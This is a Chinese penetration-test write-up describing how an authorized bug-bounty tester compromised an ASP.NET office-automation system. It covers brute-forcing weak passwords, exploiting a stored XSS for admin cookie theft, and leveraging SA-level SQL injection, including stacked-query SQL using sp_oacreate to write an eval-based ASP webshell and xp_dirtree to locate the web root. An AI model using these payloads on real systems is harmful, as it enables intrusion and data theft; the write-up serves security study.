<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記錄又一次實戰GetShell

    VSole2022-04-18 15:45:08

    嚴正聲明

    截至發稿前,已將漏洞提交廠商并驗證其已完成修復。本文僅限于技術討論與分享,嚴禁用于非法途徑。若讀者因此作出任何危害網絡安全行為后果自負,與本號及原作者無關。

    前言

    本文為記錄實戰過程中遇到的問題及思考,旨在思路分享及自我總結。文中涉及目標站點為SRC授權站點,為防止漏打碼已對實際鏈接進行了部分刪減,如去除了鏈接目錄名等。整個測試過程涉及未授權訪問、暴力破解、存儲型XSS、SQL注入,到最后拿shell,過程略微曲折。

    信息收集

    打開目標站點,為系統登錄界面。安裝VNC遠程協助鏈接到內網地址,經測試登錄無驗證碼及失敗次數鎖定,可嘗試暴力破解,此處先做信息收集。

    目標站點:http://1.2.3.4/login.aspx

    腳本:aspx,通過登錄頁面可知;

    服務器:IIS7.5,通過404、403報錯頁面可得;

    數據庫:可能為SQL Server,常見組合;

    安全防護:未知,對IP進行端口掃描會封一段時間,但測試and 1=1不攔,無WAF或未開啟嚴格的防護策略;

    通過查看返回包,發現Server為nginx/1.17.2,判斷應該存在反向代理。

    暴力破解

    通過對現有信息的分析,優先選擇暴力破解,系統首頁登錄為密碼md5前端加密后傳輸,此處爆破需選擇burp的HASH-MD5后進行爆破。

     系統登錄失敗返回信息都為“登錄失敗xxx”,無法確認是否存在用戶。

     查看頁面源碼發現存在http://1.2.3.4/client/

     此頁面未對密碼進行md5加密,即

     首頁:http://1.2.3.4/   密碼加密后傳輸

     Client:http://1.2.3.4/client/ 密碼明文傳輸

    此處用http://1.2.3.4/client/ 進行爆破,不需要進行MD5加密可提高效率,但使用name500及自定義字典,包括常見測試賬號,及3位數字,4位數字,5位數字等組成5000多個用戶名,爆破密碼123456、888888、111111,結果一個都沒爆破到。

    當時的思路是先確定用戶名,例如工號等,再去爆破其中存在弱口令的賬號,并未想著直接爆破admin,因為那時覺得后臺可能不在這里登錄,現在想想也可以直接盲爆admin用戶。

    所以那時先收集用戶名,使用Google語法,Site:xxx 工號,但并沒有收獲。針對只有登錄界面的系統,只有掌握了用戶名的規律,才能提高爆破的機率,此處很有可能是工號。用戶名收集無果,便打開了目錄掃描,看看有無敏感信息。

    未授權訪問

    通過對站點進行目錄掃描,存在以下目錄及文件。

    main.aspx訪問彈登陸超時,跳轉登陸界面,禁用js返回頁面如下:

    逐一進行訪問:css.aspx訪問彈出登陸超時,跳轉登陸界面,禁用js訪問空白;reg.aspx訪問為軟件注冊頁面;

    查看源碼,發現存在main_d.aspx如下:

    禁用js訪問main_d.aspx返回以下頁面:

    繼續查看源碼,發現以下地址通過對站點進行目錄掃描,存在以下目錄及文件。

    禁用js訪問http://1.2.3.4/MyWork/Richeng/RichengmyList_show.aspx?id=12點擊修改,此處已測試id不存在SQL注入。

    該頁面存在大量附件,其中有體檢附件登記表,點擊下載鏈接如下:

    點擊下載跳轉登陸界面

    此處感覺是有任意文件下載,但可能需要登錄,后續爆破出賬戶后可測試。

    http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls

    需下載文件,嘗試構造http://1.2.3.4/file/liaotian/201922xx.xls

    如上獲取到該單位的員工工號,使用excel生成工號列表進行暴力破解。

    登錄系統

    上述已獲取工號組合,生成01111-05555進行爆破,使用密碼123456、111111、888888、123qwe、qwe123、123123、123321。當使用密碼123321時,成功爆破出一個弱口令用戶。

    使用該賬號登錄系統

    系統功能模塊較多,測試前面的文件下載

    http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls

    嘗試下載web.config

    http://1.2.3.4/file_down.aspx?number=web.config

    測試不存在任意文件下載,修改文件后是直接Location到文件,從而下載,后續對系統的功能點逐個進行測試。

    文件上傳

    后臺功能主要存在以下4個上傳點。上傳點1-印章上傳:

    上傳點2-郵件附件:

    上傳點3-頭像上傳

    上傳點4:KindEditor 4.1.10 編輯器,貌似無解。

    上傳點1,文件上傳后的路徑為:/seal/2021815238.png

    此目錄未限制禁止腳本執行,但無法上傳腳本文件,嘗試繞過均失敗。

    上傳點2,文件上傳后的路徑為:/file/emailfile/2021081523.png

    此目錄限制了腳本執行,即/file目錄下不能執行腳本文件。

    此上傳點可上傳aspx等文件,但上傳后后綴為.unknow

    后續通過注入點發現上傳后綴寫在數據庫中,可以通過update語句增加后綴,但并無跨目錄的方法,即使上傳了aspx腳本文件,也無法執行。

    上傳文件后截圖如下:

    后續查看數據庫,允許上傳的文件后綴如下:

    上傳點3,任意文件上傳,上傳后路徑為/SystemManage/User/file/ 下,測試目錄限制腳本執行,無法跨目錄。

    存儲型XSS

    上面針對后臺上傳功能測試后無法上傳getshell,便考慮是否能找到高權限賬號,管理員賬號可能有修改上傳文件格式的權限。

    此時測試郵件存在存儲型XSS,發送郵件可以打用戶cookie。

    發送郵件給自己,收件箱打開時:

    可以給管理員發送帶XSS的郵件,當管理員打開郵件時,即可以獲取管理員的cookie,此處配合server醬,可實現獲取cookie后微信提醒通知,同樣發送郵件給自己測試。

    編寫郵件,插入XSS平臺payload。

    收件箱點開后

    微信收到Server醬通知


    登錄XSS平臺查看,成功獲取用戶cookie信息

    此處構造好XSS后,給管理員發送了標題為【問題建議】的郵件,增加管理員打開的概率,即打開郵件可獲取管理員的cookie。

    同時在郵件選擇收件人處,發現組織架構處,可列舉所有用戶的工號、科室、姓名信息。

    故可以收集用戶工號,此處發現管理員即為admin,在等待xss的同時,也構造字典對admin進行爆破。

    然后竟然成功爆破出了admin的密碼,看了下密碼在“全國弱口令TOP1000”中沒有,如果一開始就爆破admin,可能也爆不出來,個人習慣是爆TOP1000,當初也確定不了管理員就是admin。

    此處也說明有一個強字典是多么的重要。

    使用admin登錄系統后,只多了以下兩個功能模塊,很失望并沒有可以修改上傳設置的功能。

    測試發現登錄管理員也并沒啥用,還是無法getshell,既然上傳無門,那就尋找注入點,如果是sa的注入點則getshell的機率大很多。

    SQL注入

    于是又重新回到后臺各個功能點進行測試,經過一番測試終于發現了一個注入點,鏈接如下:

    測試1=1頁面正常

    測試1=2頁面異常

    爆數據庫版本信息

    如上確認存在SQL注入,使用sqlmap進行利用,當前用戶為SA。

    測試使用—os-shell命令失敗,可能是有安全設備攔截。

    此時也對數據庫的大致表進行查看,發現了管理后臺某個點的文件上傳格式可在數據庫設置后綴,但無法跨目錄,故即使能上傳腳本也無法getshell。

    Getshell

    經手工測試注入點支持堆疊注入,此處嘗試使用sp_oacreate寫馬,SQL如下:

    declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'c:\shell.asp',1;EXEC sp_oamethod @f,'WriteLine',null,'<%eval request("cmd")%>'

    但需知道網站根目錄,此處可以使用xp_dirtree進行目錄遍歷,SQL如下:

    create table dirs(subdirectory varchar(255),depth int, filee int);

    insert dirs exec xp_dirtree 'c:\',1,1

    建立表后,先執行以下查詢,此處為查詢c盤目錄下的文件夾及文件:

    http://1.2.3.4/WorkFlow/AddWorkFlow_add_Next.aspx?tmp=0.8307731177113578&add=&UpNodeNum=11,&FlowNumber=20189139012187';insert dirs exec xp_dirtree 'c:\',1,1;--&FormId=86&Number=202181414

    頁面返回正常,則語句執行成功,再去sqlmap查詢dirs表下的內容,即為c盤的目錄內容:

    利用上述方式成功找到網站根目錄為d:\OA\ 下。

    執行SQL語句寫入文件shell.asp

    declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'d:\OA\shell.asp',1;EXEC sp_oamethod @f,'WriteLine',null,'<%eval request("cmd")%>'

    打開鏈接:http://1.2.3.4/shell.asp 空白,中國菜刀連接成功。

    上傳冰蝎,后續可以進行socks代理,從而進入內網。

    通過systeminfo收集系統信息,可用于后續提權。

    以上成功獲得目標站點shell。

    總結

    滲透測試很多時候需要的細心和耐心再加上一點運氣,當我們在后臺無法getshell時,可以嘗試去找后臺的SQL注入,高權限的注入點可以直接寫shell。

    又或者當我們有一個SQL注入點卻沒法寫shell時,可以嘗試讀管理員賬號密碼,登錄后臺測試是否有文件上傳漏洞,從而進行拿shell。關注不同的漏洞危害,并進行組合利用,往往可以達到出其不意的效果。

    至此全篇完,感謝閱讀,希望您能從中有所收獲。

    文件目錄shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    8、獲取文件目錄,dir9、利用模塊收集信息WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname
    在紅隊HW中通過前期的打點獲得shell后通常下一步就是對內網進行橫向,獲得shell進想要行橫向的前提是我們必須有代理可以訪問內網中的資產,這時候我們就需要通過拿到shell的那臺機器權限,在此臺機上傳代理工具進行配置搭建內網代理,目的達到內網出網的效果,使我們能夠進行下一步的內網橫向滲透。在hw中經常用到的代理工具有很多,根據不同之需和個人不同的使用習慣選擇不同工具進行使用,本文主要對NPS這
    一般在獲取靶機的初始shell后,會進行提權,可以先查看home目錄下的用戶,因為有可能需要這個用戶來做跳板去獲取root權限;然后可以查看有沒有sudo濫用,定時任務,suid文件,或者home目錄下另外一個用戶時宿主的文件等等,但是,往往有一個很容易被忽略,歷史命令的查看。
    一、Docker逃逸 1、docker daemon api未授權訪問 漏洞原理:在使用docker swarm的時候,節點上會開放一個TCP端口2375,綁定在0.0.0.0上,如果我們使用HTTP的方式訪問會返回404 利用思路:通過掛在宿主機的目錄,寫定時任務獲取SHELL,從而逃逸。
    發現該服務器管理著近百臺的私服服務器,其CPU處理器i7-4770K不像是服務器的架構更有可能的是個人電腦,而且存在的服務有花生殼和金萬維的內網穿透服務,更加的說明了其在家中私自搭建違法私服游戲和維護賺取牟利。
    phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在于由于phpMyAdmin跟其他PHP程式一樣在網頁服務器上執行,但是您可以在任何地方使用這些程式產生的HTML頁面,
    Docker 容器入侵排查
    2023-06-15 10:00:29
    容器的運行環境是相對獨立而純粹,當容器遭受攻擊時,急需對可疑的容器進行入侵排查以確認是否已失陷,并進一步進行應急處理和溯源分析找到攻擊來源。在應急場景下,使用docker命令可以最大程度利用docker自身的特性,快速的獲取相關信息而無需進入容器內部,幫助我們進行溯源分析和解決問題。查看當前運行的容器,創建時間、運行狀態、端口映射。[root@ecs-t /]# docker psCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMESb06352ff26cc sagikazarmark/dvwa "/run.sh" About an hour ago Up About an hour 3306/tcp, 0.0.0.0:81->80/tcp dvwa
    借助代碼托管平臺(如Github)或文件共享平臺托管后續惡意軟件,已成為當前網絡攻擊者繞過網絡檢測的一種常用手段。在最近的威脅狩獵過程中,紅雨滴云沙箱也捕獲到幾例利用國內代碼托管平臺Gitee(碼云)分發惡意軟件的攻擊樣本,并且攻擊者將自身Gitee平臺的用戶名與代碼倉庫名稱偽裝為微軟相關工具,以迷惑受害者。經過進一步分析發現,這些樣本通信的C2域名屬于某地電視臺,疑似該電視臺網站被攻擊者控制。
    Kaspersky AVP.exe DLL 劫持
    2022-07-21 22:53:31
    Kaspersky AVP.exe 中的 DLL 注入允許本地管理員在不知道 Kaspersky 密碼的情況
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类